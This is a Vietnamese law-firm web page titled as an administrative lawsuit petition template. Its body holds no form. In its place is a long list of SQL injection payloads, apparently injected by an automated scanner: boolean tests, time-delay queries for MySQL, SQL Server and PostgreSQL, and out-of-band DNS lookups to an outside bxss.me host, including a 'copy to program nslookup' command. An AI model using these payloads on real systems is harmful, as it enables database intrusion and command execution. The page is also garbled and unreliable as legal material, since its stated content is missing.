Bạn cần tư vấn Pháp luật?
Hãy gọi : 1900 6188
"Tổng đài tư vấn pháp luật 1900 6188" là dịch vụ tư vấn luật qua điện thoại của Công ty Luật VinaBiz
  • Tư vấn trực tuyến miễn phí
  • Đội ngũ Luật sư uy tín
  • Tư vấn 24/7
Luật sư tư vấn pháp luật online miễn phí đầu số 1900 6188

Mẫu đơn khởi kiện án hành chính

Cập nhật lần cuối lúc 15:42 ngày 30/05/2014

1
1
1
1
-1 OR 2+223-223-1=0+0+0+1 --
-1 OR 3+223-223-1=0+0+0+1 --
-1 OR 3*2<(0+5+223-223) --
-1 OR 3*2>(0+5+223-223) --
-1 OR 2+433-433-1=0+0+0+1
-1 OR 3+433-433-1=0+0+0+1
-1 OR 3*2<(0+5+433-433)
-1 OR 3*2>(0+5+433-433)
1'"
-1' OR 2+520-520-1=0+0+0+1 --
\
-1' OR 3+520-520-1=0+0+0+1 --
1
-1' OR 3*2<(0+5+520-520) --
@@gih6G
-1' OR 3*2>(0+5+520-520) --
JyI=
-1' OR 2+66-66-1=0+0+0+1 or 'exwp3bqK'='
-1' OR 3+66-66-1=0+0+0+1 or 'exwp3bqK'='
-1' OR 3*2<(0+5+66-66) or 'exwp3bqK'='
-1' OR 3*2>(0+5+66-66) or 'exwp3bqK'='
-1" OR 2+252-252-1=0+0+0+1 --
-1" OR 2+252-252-1=0+0+0+1 --
-1" OR 3+252-252-1=0+0+0+1 --
-1" OR 3*2<(0+5+252-252) --
-1" OR 3*2>(0+5+252-252) --
(select(0)from(select(sleep(8.126000000000001)))v)/*'+(select(0)from(select(sleep(8.126000000000001)))v)+'"+(select(0)from(select(sleep(8.126000000000001)))v)+"*/
(select(0)from(select(sleep(4.063000000000001)))v)/*'+(select(0)from(select(sleep(4.063000000000001)))v)+'"+(select(0)from(select(sleep(4.063000000000001)))v)+"*/
(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/
-1; waitfor delay '0:0:12.189000000000001' --
-1); waitfor delay '0:0:4.063000000000001' --
1 waitfor delay '0:0:4.063000000000001' --
1 waitfor delay '0:0:0' --
KORzLPaw'; waitfor delay '0:0:8.126000000000001' --
-1);select pg_sleep(12.189000000000001); --
-1));select pg_sleep(12.189000000000001); --
-1));select pg_sleep(0); --
-1));select pg_sleep(4.063000000000001); --
u1pGZcJ1';select pg_sleep(4.063000000000001); --
hG2oMrsl');select pg_sleep(4.063000000000001); --
e6NKg0aY'));select pg_sleep(4.063000000000001); --
1||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-5181.34060.59cf3.1.bxss'||'.me')
'||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-5183.34060.59cf3.1.bxss'||'.me')||'
1;copy (select '') to program 'nslookup dns.sqli.\027931.34060-5184.34060.59cf3.\1.bxss.me'
1';copy (select '') to program 'nslookup dns.sqli.\027931.34060-5185.34060.59cf3.\1.bxss.me
143'

Tư vấn pháp luật online miễn phí đầu số 1900 6188

Đặt câu hỏi

Họ tên:
Email:
Tiêu đề: